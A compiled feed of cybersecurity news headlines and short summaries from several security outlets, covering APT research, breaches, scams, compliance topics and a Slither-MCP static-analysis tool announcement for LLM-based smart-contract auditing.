ESET Research analyzes Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed throughout 2024

ESET Threat Report H1 2025: Key findings

ESET Chief Security Evangelist Tony Anscombe looks at some of the report's standout findings and their implications for organizations in 2025

ESET APT Activity Report Q4 2024–Q1 2025: Malware sharing, wipers and exploits

ESET experts discuss Sandworm’s new data wiper, relentless campaigns by UnsolicitedBooker, attribution challenges amid tool-sharing, and other key findings from the latest APT Activity Report

This month in security with Tony Anscombe – June 2025 edition

From Australia's new ransomware payment disclosure rules to another record-breaking DDoS attack, June 2025 saw no shortage of interesting cybersecurity news

ESET Threat Report H1 2025

A view of the H1 2025 threat landscape as seen by ESET telemetry and from the perspective of ESET threat detection and research experts

BladedFeline: Whispering in the dark

ESET researchers analyzed a cyberespionage campaign conducted by BladedFeline, an Iran-aligned APT group with likely ties to OilRig

Don’t let dormant accounts become a doorway for cybercriminals

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

This month in security with Tony Anscombe – May 2025 edition

From a flurry of attacks targeting UK retailers to campaigns corralling end-of-life routers into botnets, it's a wrap on another month filled with impactful cybersecurity news

Word to the wise: Beware of fake Docusign emails

Cybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data

Danabot under the microscope

ESET Research has been tracking Danabot’s activity since 2018 as part of a global effort that resulted in a major disruption of the malware’s infrastructure

Danabot: Analyzing a fallen empire

ESET Research shares its findings on the workings of Danabot, an infostealer recently disrupted in a multinational law enforcement operation

Lumma Stealer: Down for the count

The bustling cybercrime enterprise has been dealt a significant blow in a global operation that relied on the expertise of ESET and other technology companies

ESET takes part in global operation to disrupt Lumma Stealer

Our intense monitoring of tens of thousands of malicious samples helped this global disruption operation

The who, where, and how of APT attacks in Q4 2024–Q1 2025

ESET Chief Security Evangelist Tony Anscombe highlights key findings from the latest issue of the ESET APT Activity Report

ESET APT Activity Report Q4 2024–Q1 2025

An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q4 2024 and Q1 2025

Sednit abuses XSS flaws to hit gov't entities, defense companies

Operation RoundPress targets webmail software to steal secrets from email accounts belonging mainly to governmental organizations in Ukraine and defense contractors in the EU

Operation RoundPress

ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities

How can we counter online disinformation? | Unlocked 403 cybersecurity podcast (S2E2)

Ever wondered why a lie can spread faster than the truth? Tune in for an insightful look at disinformation and how we can fight one of the most pressing challenges facing our digital world.

Catching a phish with many faces

Here’s a brief dive into the murky waters of shape-shifting attacks that leverage dedicated phishing kits to auto-generate customized login pages on the fly

Beware of phone scams demanding money for ‘missed jury duty’

When we get the call, it’s our legal responsibility to attend jury service. But sometimes that call won’t come from the courts – it will be a scammer.

Toll road scams are in overdrive: Here’s how to protect yourself

Have you received a text message about an unpaid road toll? Make sure you’re not the next victim of a smishing scam.

RSAC 2025 wrap-up – Week in security with Tony Anscombe

From the power of collaborative defense to identity security and AI, catch up on the event's key themes and discussions

TheWizards APT group uses SLAAC spoofing to perform adversary-in-the-middle attacks

ESET researchers analyzed Spellbinder, a lateral movement tool used to perform adversary-in-the-middle attacks

This month in security with Tony Anscombe – April 2025 edition

From the near-demise of MITRE's CVE program to a report showing that AI outperforms elite red teamers in spearphishing, April 2025 was another whirlwind month in cybersecurity

How safe and secure is your iPhone really?

Your iPhone isn't necessarily as invulnerable to security threats as you may think. Here are the key dangers to watch out for and how to harden your device against bad actors.

Deepfake 'doctors' take to TikTok to peddle bogus cures

Look out for AI-generated 'TikDocs' who exploit the public's trust in the medical profession to drive sales of sketchy supplements

How fraudsters abuse Google Forms to spread scams

The form and quiz-building tool is a popular vector for social engineering and malware. Here’s how to stay safe.

Will super-smart AI be attacking us anytime soon?

What practical AI attacks exist today? “More than zero” is the answer – and they’re getting better.

CapCut copycats are on the prowl

Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead

They’re coming for your data: What are infostealers and how do I stay safe?

Here's what to know about malware that raids email accounts, web browsers, crypto wallets, and more – all in a quest for your sensitive data

Attacks on the education sector are surging: How can cyber-defenders respond?

Academic institutions have a unique set of characteristics that makes them attractive to bad actors. What's the right antidote to cyber-risk?

Watch out for these traps lurking in search results

Here’s how to avoid being hit by fraudulent websites that scammers can catapult directly to the top of your search results

So your friend has been hacked: Could you be next?

When a ruse puts on a familiar face, your guard might drop, making you an easy mark. Learn how to tell a friend apart from a foe.

What impact does Agentic AI have on cloud-native security

How Can Organizations Safeguard Non-Human Identities in the Age of Agentic AI? How can robust management of Non-Human Identities (NHIs) and Secrets Security Management tighten your organization’s cybersecurity defenses? While the concept might sound futuristic, the impact is very real, especially in cloud-native environments. Let’s unravel how effective management of NHIs can mitigate potential security […]

The post What impact does Agentic AI have on cloud-native security appeared first on Entro.

The post What impact does Agentic AI have on cloud-native security appeared first on Security Boulevard.

Why is Agentic AI critical for future cybersecurity

Have You Considered the Impact of Non-Human Identities on Cybersecurity? The future of cybersecurity is being reshaped by the rise of Agentic AI, but how does this affect our approach to managing Non-Human Identities (NHIs)? With cybersecurity demands evolve, professionals are pushed to rethink their strategies to accommodate this shift. I’ve seen how negligence in […]

The post Why is Agentic AI critical for future cybersecurity appeared first on Entro.

The post Why is Agentic AI critical for future cybersecurity appeared first on Security Boulevard.

How do you scale Non-Human Identity management safely

Are Non-Human Identities the Hidden Vulnerability in Your Cybersecurity Strategy? Non-Human Identities (NHIs) have emerged as a crucial component of cybersecurity. But how well are they being managed? This question confronts organizations across industries such as financial services, healthcare, and travel, where the management of NHIs can be the linchpin of an effective security strategy. […]

The post How do you scale Non-Human Identity management safely appeared first on Entro.

The post How do you scale Non-Human Identity management safely appeared first on Security Boulevard.

How does Secrets Management contribute to compliance

Are You Managing Non-Human Identities with the Care They Deserve? Digital interconnected has seen a growing emphasis on cybersecurity measures that ensure both data integrity and user privacy. While more organizations migrate their operations to cloud environments, the focus on protecting machine identities, often referred to as Non-Human Identities (NHIs), becomes paramount. This shift is […]

The post How does Secrets Management contribute to compliance appeared first on Entro.

The post How does Secrets Management contribute to compliance appeared first on Security Boulevard.

A Single Bug in Mobile Apps Can Cost You Millions! Protect with Secure Code Review!

A leading banking app was forced into a three-day shutdown after attackers exploited a small coding oversight that granted access to customer accounts. The flaw had quietly existed in the codebase for months, completely slipping past the development team. What made the incident even more frustrating was that a simple peer review could have identified […]

The post A Single Bug in Mobile Apps Can Cost You Millions! Protect with Secure Code Review! appeared first on Kratikal Blogs.

The post A Single Bug in Mobile Apps Can Cost You Millions! Protect with Secure Code Review! appeared first on Security Boulevard.

NDSS 2025 – MineShark: Cryptomining Traffic Detection At Scale

SESSION
Session 3A: Network Security 1

Authors, Creators & Presenters: Shaoke Xi (Zhejiang University), Tianyi Fu (Zhejiang University), Kai Bu (Zhejiang University), Chunling Yang (Zhejiang University), Zhihua Chang (Zhejiang University), Wenzhi Chen (Zhejiang University), Zhou Ma (Zhejiang University), Chongjie Chen (HANG ZHOU CITY BRAIN CO., LTD), Yongsheng Shen (HANG ZHOU CITY BRAIN CO., LTD), Kui Ren (Zhejiang University)

----
PAPER
-----

MineShark: Cryptomining Traffic Detection at Scale
The rapid growth of cryptojacking and the increase in regulatory bans on cryptomining have prompted organizations to enhance detection ability within their networks. Traditional methods, including rule-based detection and deep packet inspection, fall short in timely and comprehensively identifying new and encrypted mining threats. In contrast, learning-based techniques show promise by identifying content-agnostic traffic patterns, adapting to a wide range of cryptomining configurations. However, existing learning-based systems often lack scalability in real-world detection, primarily due to challenges with unlabeled, imbalanced, and high-speed traffic inputs. To address these issues, we introduce MineShark, a system that identifies robust patterns of mining traffic to distinguish between vast quantities of benign traffic and automates the confirmation of model outcomes through active probing to prevent an overload of model alarms. As model inference labels are progressively confirmed, MineShark conducts self-improving updates to enhance model accuracy. MineShark is capable of line-rate detection at various traffic volume scales with the allocation of different amounts of CPU and GPU resources. In a 10 Gbps campus network deployment lasting ten months, MineShark detected cryptomining connections toward 105 mining pools ahead of concurrently deployed commercial systems, 17.6% of which were encrypted. It automatically filtered over 99.3% of false alarms and achieved an average packet processing throughput of 1.3 Mpps, meeting the line-rate demands of a 10 Gbps network, with a negligible loss rate of 0.2%. We publicize MineShark for broader use.

-----
ABOUT NDSS
-----

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

-----

Our thanks to the **[Network and Distributed System Security (NDSS) Symposium][1]** for publishing their Creators, Authors and Presenter’s superb **[NDSS Symposium 2025 Conference][2]** content on the **[organization’s’][1]** **[YouTube][3]** channel.

Permalink

The post NDSS 2025 – MineShark: Cryptomining Traffic Detection At Scale appeared first on Security Boulevard.

Level up your Solidity LLM tooling with Slither-MCP

We’re releasing Slither-MCP, a new tool that augments LLMs with Slither’s unmatched static analysis engine. Slither-MCP benefits virtually every use case for LLMs by exposing Slither’s static analysis API via tools, allowing LLMs to find critical code faster, navigate codebases more efficiently, and ultimately improve smart contract authoring and auditing performance.

How Slither-MCP works

Slither-MCP is an MCP server that wraps Slither’s static analysis functionality, making it accessible through the Model Context Protocol. It can analyze Solidity projects (Foundry, Hardhat, etc.) and generate comprehensive metadata about contracts, functions, inheritance hierarchies, and more.

When an LLM uses Slither-MCP, it no longer has to rely on rudimentary tools like grep and read_file to identify where certain functions are implemented, who a function’s callers are, and other complex, error-prone tasks.

Because LLMs are probabilistic systems, in most cases they are only probabilistically correct. Slither-MCP helps set a ground truth for LLM-based analysis using traditional static analysis: it reduces token use and increases the probability a prompt is answered correctly.

Example: Simplifying an auditing task

Consider a project that contains two ERC20 contracts: one used in the production deployment, and one used in tests. An LLM is tasked with auditing a contract’s use of ERC20.transfer(), and needs to locate the source code of the function.

Without Slither-MCP, the LLM has two options:

1. Try to resolve the import path of the ERC20 contract, then try to call read_file to view the source of ERC20.transfer(). This option usually requires multiple calls to read_file, especially if the call to ERC20.transfer() is through a child contract that is inherited from ERC20. Regardless, this option will be error-prone and tool call intensive.

2. Try to use the grep tool to locate the implementation of ERC20.transfer(). Depending on how the grep tool call is structured, it may return the wrong ERC20 contract.

Both options are non-ideal, error-prone, and not likely to be correct with a high interval of confidence.

Using Slither-MCP, the LLM simply calls get_function_source to locate the source code of the function.

Simple setup

Slither-MCP is easy to set up, and can be added to Claude Code using the following command:

claude mcp add --transport stdio slither -- uvx --from git+https://github.com/trailofbits/slither-mcp slither-mcp

It is also easy to add Slither-MCP to Cursor by adding the following to your ~/.cursor/mcp.json:

{
 "mcpServers": {
 "slither-mcp": {
 "command": "uvx --from git+https://github.com/trailofbits/slither-mcp slither-mcp",
 "env": {
 "PYTHONUNBUFFERED": "1"
 }
 }
 }
}

For now, Slither-MCP exposes a subset of Slither’s analysis engine that we believe LLMs would have the most benefit consuming. This includes the following functionalities:

• Extracting the source code of a given contract or function for analysis

• Identifying the callers and callees of a function

• Identifying the contract’s derived and inherited members

• Locating potential implementations of a function based on signature (e.g., finding concrete definitions for IOracle.price(...))

• Running Slither’s exhaustive suite of detectors and filtering the results

If you have requests or suggestions for new MCP tools, we’d love to hear from you.

Licensing

Slither-MCP is licensed AGPLv3, the same license Slither uses. This license requires publishing the full source code of your application if you use it in a web service or SaaS product. For many tools, this isn’t an acceptable compromise.

To help remediate this, we are now offering dual licensing for both Slither and Slither-MCP. By offering dual licensing, Slither and Slither-MCP can be used to power LLM-based security web apps without publishing your entire source code, and without having to spend years reproducing its feature set.

If you are currently using Slither in your commercial web application, or are interested in using it, please reach out.

The post Level up your Solidity LLM tooling with Slither-MCP appeared first on Security Boulevard.

Conduent Faces Financial Hit, Lawsuits from Breach Affecting 10.5 Million

The intrusion a year ago into Conduent Business Solutions' systems, likely by the SafePay ransomware group, that affected more than 10.5 individuals will likely cost the company more than $50 million in related expenses and millions more to settle the lawsuits that are piling up.

The post Conduent Faces Financial Hit, Lawsuits from Breach Affecting 10.5 Million appeared first on Security Boulevard.

FedRAMP Deviation Requests: When and How to Submit

FedRAMP is a government-wide program meant to ensure a standardized baseline for information security throughout the cloud service providers working with the federal government. It’s a tall order. Setting forth standards that are robust enough to cover all the bases, while being open and flexible enough to cover every CSP, is not easy. NIST has […]

The post FedRAMP Deviation Requests: When and How to Submit appeared first on Security Boulevard.

Deriving Value from Enhanced NHI Security Protocols

How Does the Management of Non-Human Identities (NHIs) Bridge Security Gaps? Cybersecurity is complex and multifaceted. Where machines and applications continuously interact and communicate with one another across various platforms, one may wonder how we can effectively manage these interactions to minimize security vulnerabilities. The concept of Non-Human Identities (NHIs) provides an intriguing solution when […]

The post Deriving Value from Enhanced NHI Security Protocols appeared first on Entro.

The post Deriving Value from Enhanced NHI Security Protocols appeared first on Security Boulevard.

Microsoft: Windows 10 KB5068781 ESU update may fail with 0x800f0922 errors

Microsoft has confirmed it is investigating a bug causing the Windows 10 KB5068781 extended security update to fail to install with 0x800f0922 errors on devices with corporate licensing. [...]

Decades-old ‘Finger’ protocol abused in ClickFix malware attacks

The decades-old "finger" command is making a comeback,, with threat actors using the protocol to retrieve remote commands to execute on Windows devices. [...]

Jaguar Land Rover cyberattack cost the company over $220 million

Jaguar Land Rover (JLR) published its financial results for July 1 to September 30, warning that the cost of a recent cyberattack totaled £196 million ($220 million) in the quarter. [...]

Logitech confirms data breach after Clop extortion attack

Hardware accessory giant Logitech has confirmed it suffered a data breach in a cyberattack claimed by the Clop extortion gang, which conducted Oracle E-Business Suite data theft attacks in July. [...]

Five plead guilty to helping North Koreans infiltrate US firms

The U.S. Department of Justice announced that five individuals pleaded guilty to aiding North Korea's illicit revenue generation schemes, including remote IT worker fraud and cryptocurrency theft. [...]

Anthropic claims of Claude AI-automated cyberattacks met with doubt

Anthropic reports that a Chinese state-sponsored threat group, tracked as GTG-1002, carried out a cyber-espionage operation that was largely automated through the abuse of the company's Claude Code AI model. [...]

Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks

Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited. [...]

Checkout.com snubs hackers after data breach, to donate ransom instead

UK financial technology company Checkout announced that the ShinyHunters threat group has breached one of its legacy cloud storage systems and is now extorting the company for a ransom. [...]

US announces new strike force targeting Chinese crypto scammers

U.S. federal authorities have established a new task force to disrupt Chinese cryptocurrency scam networks that defraud Americans of nearly $10 billion annually. [...]

Google backpedals on new Android developer registration rules

Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs. [...]

ASUS warns of critical auth bypass flaw in DSL series routers

ASUS has released new firmware to patch a critical authentication bypass security flaw impacting several DSL series router models. [...]

DoorDash hit by new data breach in October exposing user information

DoorDash has disclosed a data breach that hit the food delivery platform this October. Beginning yesterday evening, DoorDash, which serves millions of customers across the U.S., Canada, Australia, and New Zealand, started emailing those impacted by the newly discovered security incident. [...]

Fortinet FortiWeb flaw with public PoC exploited to create admin users

A Fortinet FortiWeb path traversal vulnerability is being actively exploited to create new administrative users on exposed devices without requiring authentication [...]

Google now lets you add friends as contacts for account recovery

Google now lets you recover your accounts using your phone number or trusted contacts.

Cyber giant F5 Networks says government hackers had ‘long-term’ access to its systems, stole code and customer data

The company, which provides cybersecurity defenses to most of the Fortune 500, said the DOJ allowed it to delay notifying the public on national security grounds.

A breach every month raises doubts about South Korea’s digital defenses

Known for its blazing fast internet and home to some of the world’s biggest tech giants, South Korea has also faced a string of data breaches and cybersecurity lapses that has struggled to match the pace of its digital ambitions.

Proton releases a new app for two-factor authentication

Proton has a free authenticator app, which is available cross-platform with end-to-end encryption protection for data.

Knox lands $6.5M to compete with Palantir in the federal compliance market

Irina Denisenko, CEO of Knox, launched Knox, a federal managed cloud provider, last year with a mission to help software vendors speed through the FedRAMP security authorization process in just three months, and at a fraction of what it would cost to do it on their own.

Google is adding new device-level features for its Advanced Protection program

At the Android Show, taking place ahead of Google I/O 2025, Google announced that it is adding new device-specific features to its Advanced Protection program, which is designed to protect public figures such as politicians and journalists from different digital threats, with the Android 16 release. The new features include a new way of storing […]

Google announces new security features for Android for protection against scam and theft

At the Android Show on Tuesday, ahead of Google I/O, Google announced new security and privacy features for Android. These new features include new protections for calls, screen sharing, messages, device access, and system-level permissions. With these features, Google aims to protect users from falling for a scam, keep their details secure in case a […]

A 25-year-old police drone founder just raised $75M led by Index

If you ever call 911 from an area that’s hard to get to, you might hear the buzz of a drone well before a police cruiser pulls up. And there’s a good chance that it will be one made by Brinc Drones, a Seattle-based startup founded by 25-year-old Blake Resnick, who dropped out of college […]

A new security fund opens up to help protect the fediverse

A new security fund aims to help apps in the fediverse — like Mastodon, Threads, and Pixelfed — to pay researchers for disclosing security bugs.

How to tell if your online accounts have been hacked

This is a guide on how to check whether someone compromised your online accounts.

Hackers are ramping up attacks using year-old ServiceNow security bugs to target unpatched systems

Threat intelligence startup GreyNoise says it has observed a ‘notable resurgence’ in attack activity

US teachers’ union says hackers stole sensitive personal data on over 500,000 members

PSEA says it "took steps to ensure" its stolen data was deleted, suggesting a ransom demand was paid

CISA scrambles to contact fired employees after court rules layoffs ‘unlawful’

Federal court rules U.S. cybersecurity agency must re-hire over 100 former employees

DOGE axes CISA ‘red team’ staffers amid ongoing federal cuts

Affected staff say more than 100 employees working to protect U.S. government networks were ‘axed’ with no prior warning

What PowerSchool won’t say about its data breach affecting millions of students

New details have emerged about PowerSchool's data breach — but here's what PowerSchool still isn't saying.

Hacker accessed PowerSchool’s network months before massive December breach

CrowdStrike says a hacker had access to PowerSchool's internal system as far back as August.

Japanese telco giant NTT Com says hackers accessed details of almost 18,000 organizations

Unidentified hackers breached NTT Com’s network to steal personal information of employees at thousands of corporate customers

FBI says scammers are targeting US executives with fake BianLian ransom notes

The FBI is warning that scammers are impersonating the BianLian ransomware gang using fake ransom notes sent to U.S. corporate executives. The fake ransom notes, first reported by U.S. cybersecurity company GuidePoint Security, claim that hackers have gained access to an organization’s network to steal sensitive data, and threaten to publish the stolen data unless […]

UK quietly scrubs encryption advice from government websites

The UK is no longer recommending the use of encryption for at-risk groups following its iCloud backdoor demands

Broadcom urges VMware customers to patch ‘emergency’ zero-day bugs under active exploitation

Security experts warn of ‘huge impact’ of actively exploited hypervisor flaws that allow sandbox escape

KoDDoS was in Paris yesterday for Tech Show Paris 2025

Barely back from Miami where CloudFest 2025 was held, our teams were yesterday in Paris for Tech Show Paris 2025 a key European gathering where strategic vision, technological innovation and real operational feedback truly intersect. Tech Show Paris is one of the most influential events in Europe for cloud, cybersecurity, data and infrastructure professionals. The … Continue reading KoDDoS was in Paris yesterday for Tech Show Paris 2025

The post KoDDoS was in Paris yesterday for Tech Show Paris 2025 appeared first on KoDDoS Blog.

KoDDoS at CloudFest USA in Miami

KoDDoS is currently on-site at CloudFest USA in Miami. CloudFest USA is recognized as the most strategic event for the internet infrastructure, cloud hosting, and digital sovereignty ecosystem. Here in Miami, industry leaders gather to shape the next phase of the Internet: business models, network architecture, cybersecurity, resilience, independence and trust. Miami itself is symbolic: … Continue reading KoDDoS at CloudFest USA in Miami

The post KoDDoS at CloudFest USA in Miami appeared first on KoDDoS Blog.

KoDDoS, MSP Global and CloudFest: a Strategic Partnership for the Future of the Cloud

KoDDoS is proud to announce its partnership with MSP Global and CloudFest, two key players in the digital technology and cloud services industry. This collaboration marks an important step toward strengthening ties within the global tech ecosystem, bringing together experts, service providers, and decision-makers to address the cloud’s most strategic challenges. Through this partnership, we … Continue reading KoDDoS, MSP Global and CloudFest: a Strategic Partnership for the Future of the Cloud

The post KoDDoS, MSP Global and CloudFest: a Strategic Partnership for the Future of the Cloud appeared first on KoDDoS Blog.

Recap of Our Presence at VivaTech 2025

Our Core Expertise: Offshore Hosting & Advanced Cybersecurity At KoDDoS, we’ve built our reputation on two complementary pillars: 🛡️ Robust Cybersecurity Capabilities For over a decade, we’ve been protecting digital infrastructure with cutting-edge security technologies: 🌐 Resilient and Sovereign Offshore Hosting Our global infrastructure is distributed across strategic offshore data centers in: This setup offers … Continue reading Recap of Our Presence at VivaTech 2025

The post Recap of Our Presence at VivaTech 2025 appeared first on KoDDoS Blog.

KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges.

Paris, June 2025 – From June 11 to 14, Paris will once again become the global epicenter of technological innovation with the return of VivaTechnology 2025, held at Paris Expo Porte de Versailles. Bringing together major tech companies, disruptive startups, global investors, and public institutions, the event stands out as a pivotal moment for the … Continue reading KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges.

The post KoDDoS at VivaTechnology 2025: A Strategic Presence at the Heart of Cybersecurity and AI Challenges. appeared first on KoDDoS Blog.

Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe

Video games are more than entertainment; they’re a $200 billion global industry. But as gaming grows, so do cyberattacks. Hackers now see games as goldmines for stealing data, extorting companies, and exploiting players.  According to Infosecurity Magazine, Akamai’s 2024 report shows that attacks on gaming platforms are rising alarmingly. In 2024 alone, the industry suffered … Continue reading Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe

The post Gamer Over? Why Hackers Target Popular Video Games & How to Stay Safe appeared first on KoDDoS Blog.

How Social Media Use Can Create Hidden Cybersecurity Risks

Social media is all around us, helping us stay connected, updated, and entertained. But beneath the endless scroll, a darker reality exists. Hidden cybersecurity threats are growing- some obvious, others much harder to spot. The risks are especially alarming for young users. According to the National Institutes of Health, up to 95% of teens aged … Continue reading How Social Media Use Can Create Hidden Cybersecurity Risks

The post How Social Media Use Can Create Hidden Cybersecurity Risks appeared first on KoDDoS Blog.

KoDDoS at the InCyber ​​Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem

From April 1st to 3rd, 2025, KoDDoS, a provider of specialized services in DDoS protection and secure offshore hosting, marked its presence at the InCyber ​​Europe Forum, held at the Lille Grand Palais. A true crossroads of cyber innovation and cooperation, the event is the largest cybersecurity event in Europe. A benchmark event on an … Continue reading KoDDoS at the InCyber ​​Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem

The post KoDDoS at the InCyber ​​Europe 2025 Forum: a strategic participation at the heart of the European cyber ecosystem appeared first on KoDDoS Blog.

Looking back at CloudFest 2025: An essential event for the future of the cloud!

CloudFest is one of the world’s largest cloud computing events. Every year, it brings together the industry’s leading players to discuss the latest technological advancements, emerging trends, and market challenges. In 2025, the event once again cemented its leadership status by providing a dynamic platform for professional exchange and cloud innovation. This edition featured captivating … Continue reading Looking back at CloudFest 2025: An essential event for the future of the cloud!

The post Looking back at CloudFest 2025: An essential event for the future of the cloud! appeared first on KoDDoS Blog.

KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.

KoDDoS recently strengthened its commitment to the European tech scene by participating in several major events in France. Our team was honored to be invited to key gatherings in the tech industry, highlighting the importance of innovation and cybersecurity in the evolving digital ecosystem. This strategic tour in Paris allowed us to meet top-tier partners, … Continue reading KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris.

The post KoDDoS in Europe: A Strong Presence at Major Tech Events in Paris. appeared first on KoDDoS Blog.

The UK’s Four-Step Framework for Supply Chain Resilience

Ransomware attacks can ripple through supply chains, causing serious disruption and massive financial consequences for multiple businesses in one fell swoop. As such, CISOs are spending more time considering how to keep operations secure as ecosystems span across dozens, if not hundreds, of vendors, contractors, and digital dependencies. With this in mind, the UK government has released a strategic framework to help organizations secure their supply chains. Let’s explore that guidance. Step 1: Understand why supply chain security is important Your security is only as strong as the weakest...

Security vs. Compliance: What's the Difference?

Security and compliance—a phrase often uttered in the same breath as if they are two sides of the same coin, two members of the same team, or two great tastes that go great together. The truth is, they can be. But it takes some effort. How can security and compliance teams work together to create a winning alliance, protect data, develop according to modern practices, and still pass an audit? This blog will give you a start. A Real-World Scenario of Compliance and Security Living Two Separate Lives As much as I would like to see auditors, developers, and security analysts living in harmony...

Continuous PCI DSS Compliance with File Integrity Monitoring

PCI DSS compliance is often seen as a one-off task, that is, you do the audit, implement controls, and then move on. But then there comes the problem - systems aren’t static, meaning that files, scripts, and configurations change constantly, and even small untracked changes can create gaps that lead to non-compliance or security issues. This is where File Integrity Monitoring (FIM) comes in. It tracks critical files, system binaries, scripts, and configs in real time, alerting when anything changes unexpectedly. For PCI DSS, this is exactly what’s required, from preventing unauthorized changes...

Are We Failing to Secure Files? Attackers Aren’t Failing to Check

According to a new Ponemon study, weak file protections now account for several cybersecurity incidents a year for many organizations. Unsafe file-sharing practices, malicious vendor files, weak access controls, and obscured file activity are largely to blame. File Integrity Monitoring (FIM) could be the solution. Are Files Safe in Transit? More Than Half Unsure You know something’s wrong when more people feel better about downloading files from unknown sources than they do about file uploads or transfers. Over 50% were unsure if files sent via email, transferred via third parties, or...

Beyond VDI: Security Patterns for BYOD and Contractors in 2025

Remote work is no longer a contingency – it’s the operating norm. Yet the security posture for that work often leans on virtual desktops as a default, even when the workforce is dominated by bring‑your‑own‑device (BYOD) users and short‑term contractors. Virtual desktop infrastructure (VDI) can centralize risk, but it can also centralize failure, expand the admin plane, and add latency that users will work around. This piece examines when VDI stops being the safest choice and what to use instead. I’ll compare concrete control patterns, such as secure local enclaves, strong identity guardrails...

Vulnerability Management and Patch Management: How They Work Together

Vulnerability management and patch management are often spoken of in the same breath. Yet they are not the same. Each serves a distinct purpose, and knowing the difference is more than a matter of semantics; it’s a matter of security. Confuse them, and gaps appear. Leave those gaps, and attackers will find them. To build a strong defense, you need to see how these two processes fit together. One scans the horizon for weaknesses. The other arms you with fixes. Both are vital, but neither can do the other’s job. Let’s take a closer look at what they mean, how they differ, and how they work in...

Understanding the OWASP AI Maturity Assessment

Today, almost all organizations use AI in some way. But while it creates invaluable opportunities for innovation and efficiency, it also carries serious risks. Mitigating these risks and ensuring responsible AI adoption relies on mature AI models, guided by governance frameworks. The OWASP AI Maturity Assessment Model (AIMA) is one of the most practical. In this article, we’ll explore what it is, how it compares to other frameworks, and how organizations can use it to assess their AI maturity. What is the OWASP AI Maturity Assessment Model? The OWASP AI Maturity Assessment Model is a...

CISOs Concerned of AI Adoption in Business Environments

UK security leaders are making their voices heard. Four in five want DeepSeek under regulation. They see a tool that promises efficiency but risks chaos. Business is already under pressure. Trade disputes drag on. Interest rates remain high. Cyber threats grow. Every move to expand operations adds risk, and risk is harder to measure when AI enters the equation. AI spreads fast. It cuts costs, fills gaps, and automates mundane tasks. But it also opens hidden doors. In the UK, AI is now part of daily work. A KPMG survey showed that while 69% of employees use it, only 42% trust it. Slightly over...

When It Comes to Breaches, Boards Can’t Hide Behind CISOs Any Longer

A trend that has long been on the rise is finally having its day. A recent industry report revealed that 91% of security professionals believe that ultimate accountability for cybersecurity incidents lies with the board itself, not with CISOs or security managers. If the security discussion hadn’t fully made its way into C-suite conversations before, it has now. The Chartered Institute of Information Security (CIISEC)’s new State of the Security Profession survey checks the pulse of the industry where cybersecurity regulation is concerned. It emerges with one clear, overarching sentiment: “the...

Windows 10 Retirement: A Reminder for Managing Legacy Industrial Control Systems (ICS)

On October 14th, Windows 10 will be retired, and Microsoft will no longer push patches or updates to systems on that operating system. It is crucial for companies to make the jump to Windows 11 now—or risk being exposed to critical vulnerabilities. This is especially important for Industrial Control Systems (ICS), which often run on legacy systems. Failing to transition could mean putting components like PLCs (Programmable Logic Controllers), SCADA (Supervisory Control and Data Aquisition) systems, HMIs (Human-Machine Interfaces) and the critical infrastructure they support at risk. What...

DOJ lauds series of gains against North Korean IT worker scheme, crypto thefts

Federal prosecutors secured five guilty pleas from people who supported overseas remote IT workers, and seized $15 million in stolen cryptocurrency tied to the North Korean regime.

The post DOJ lauds series of gains against North Korean IT worker scheme, crypto thefts appeared first on CyberScoop.

China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work

Anthropic and AI security experts told CyberScoop that behind the hype, effective AI-driven cyberattacks still require skilled humans, with the attack possibly done to send a message as to show what’s possible.

The post China’s ‘autonomous’ AI-powered hacking campaign still required a ton of human work  appeared first on CyberScoop.

Google, researchers see signs that Lighthouse text scammers disrupted after lawsuit

SecAlliance and Silent Push confirmed that the suspected Chinese operators of the phishing kit appear to have been affected.

The post Google, researchers see signs that Lighthouse text scammers disrupted after lawsuit appeared first on CyberScoop.

The retail sector needs a cybersecurity talent incubator

Retailers are exposed to cyber attacks – and personnel, not tech, is the answer.

The post The retail sector needs a cybersecurity talent incubator appeared first on CyberScoop.

FBI calls Akira ‘top five’ ransomware variant out of 130 targeting US businesses

Officials shared indicators of compromise observed as recently as this month to help organizations hunt for and defend against the ransomware group, which has pocketed $244 million as of late September.

The post FBI calls Akira ‘top five’ ransomware variant out of 130 targeting US businesses appeared first on CyberScoop.

Washington Post confirms data on nearly 10,000 people stolen from its Oracle environment

The newspaper said a “bad actor” contacted the company in late September, prompting an investigation that nearly a month later confirmed the extent of compromise.

The post Washington Post confirms data on nearly 10,000 people stolen from its Oracle environment appeared first on CyberScoop.

Operation Endgame targets malware networks in global crackdown

Rhadamanthys, VenomRAT, and the Elysium botnet were targeted in the takedowns.

The post Operation Endgame targets malware networks in global crackdown appeared first on CyberScoop.

Congressional Dems press governors to block feds from accessing state DMV data

Forty House and Senate members tell Democratic governors they may not be aware of how much they’re sharing with ICE and other immigration agencies.

The post Congressional Dems press governors to block feds from accessing state DMV data appeared first on CyberScoop.

While White House demands deterrence, Trump shrugs

Trump’s dismissive remarks on cyber threats contrast sharply with his administration’s official calls for action.

The post While White House demands deterrence, Trump shrugs appeared first on CyberScoop.

Google files lawsuit against Lighthouse ‘phishing for dummies’ text scammers

The suspected Chinese schemers behind it enable those constant fake E-Z Pass and U.S. Postal Service smishing messages.

